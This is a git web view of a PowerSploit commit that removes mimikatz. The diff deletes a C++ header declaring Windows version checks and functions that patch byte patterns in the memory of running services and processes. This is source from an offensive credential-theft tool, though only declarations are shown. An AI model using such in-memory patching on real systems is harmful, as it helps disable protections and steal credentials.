aboutsummaryrefslogtreecommitdiff
path: root/Exfiltration/mimikatz-1.0/modules/mod_patch.h
diff options
context:
space:
mode:
authormattifestation <mattgraeber@gmail.com>2014-02-03 17:13:35 -0500
committermattifestation <mattgraeber@gmail.com>2014-02-03 17:13:41 -0500
commitc5168cdba6a3b2d7dd8d79c8ac9583d3ace6a504 (patch)
tree31e4238db4984481442faa780e8921782c5de848 /Exfiltration/mimikatz-1.0/modules/mod_patch.h
parentd9ca5357e4603222268b1c619da10cc7858153d4 (diff)
downloadPowerSploit-c5168cdba6a3b2d7dd8d79c8ac9583d3ace6a504.tar.gz
PowerSploit-c5168cdba6a3b2d7dd8d79c8ac9583d3ace6a504.zip
Removed mimikatz.
This doesn't need to reside in PowerSploit. Those that are truly paranoid should validate that the embedded executable in Invoke-Mimikatz.ps1 is indeed mimikatz. This was causing AV to flag upon downloading PowerSploit.
Diffstat (limited to 'Exfiltration/mimikatz-1.0/modules/mod_patch.h')
-rw-r--r--Exfiltration/mimikatz-1.0/modules/mod_patch.h57
1 files changed, 0 insertions, 57 deletions
diff --git a/Exfiltration/mimikatz-1.0/modules/mod_patch.h b/Exfiltration/mimikatz-1.0/modules/mod_patch.h
deleted file mode 100644
index 1ae901d..0000000
--- a/Exfiltration/mimikatz-1.0/modules/mod_patch.h
+++ /dev/null
@@ -1,57 +0,0 @@
-/* Benjamin DELPY `gentilkiwi`
- http://blog.gentilkiwi.com
- benjamin@gentilkiwi.com
- Licence : http://creativecommons.org/licenses/by/3.0/fr/
-*/
-#pragma once
-#include "globdefs.h"
-#include "mod_system.h"
-#include "mod_process.h"
-#include "mod_memory.h"
-#include "mod_service.h"
-#include <iostream>
-
-class mod_patch
-{
-public:
- typedef struct _KIWI_OS_CHECK
- {
- DWORD majorVersion;
- DWORD minorVersion;
- DWORD build;
- bool isServer;
- bool is64;
- } KIWI_OS_CHECK, *PKIWI_OS_CHECK;
-
- enum OS
- {
- WINDOWS_2000_PRO_x86,
- WINDOWS_2000_SRV_x86,
-
- WINDOWS_XP_PRO___x86,
- WINDOWS_XP_PRO___x64,
- WINDOWS_2003_____x86,
- WINDOWS_2003_____x64,
-
- WINDOWS_VISTA____x86,
- WINDOWS_VISTA____x64,
- WINDOWS_2008_____x86,
- WINDOWS_2008_____x64,
-
- WINDOWS_SEVEN____x86,
- WINDOWS_SEVEN____x64,
- WINDOWS_2008r2___x64,
-
- WINDOWS_8________x86,
- WINDOWS_8________x64,
- WINDOWS_8_SERVER_x64
- };
-
- static bool getFullVersion(DWORD * majorVersion = NULL, DWORD * minorVersion = NULL, DWORD * build = NULL, bool * isServer = NULL, bool * is64 = NULL);
- static bool checkVersion(KIWI_OS_CHECK * monOsValide);
- static bool checkVersion(OS monOsValide);
- static bool checkVersion(vector<OS> * vectorValid);
-
- static bool patchModuleOfService(wstring serviceName, wstring moduleName, BYTE * patternToSearch, SIZE_T szPatternToSearch, BYTE * patternToPlace, SIZE_T szPatternToPlace, long offsetForPlace = 0);
- static bool patchModuleOfPID(DWORD pid, wstring moduleName, BYTE * patternToSearch, SIZE_T szPatternToSearch, BYTE * patternToPlace, SIZE_T szPatternToPlace, long offsetForPlace = 0);
-};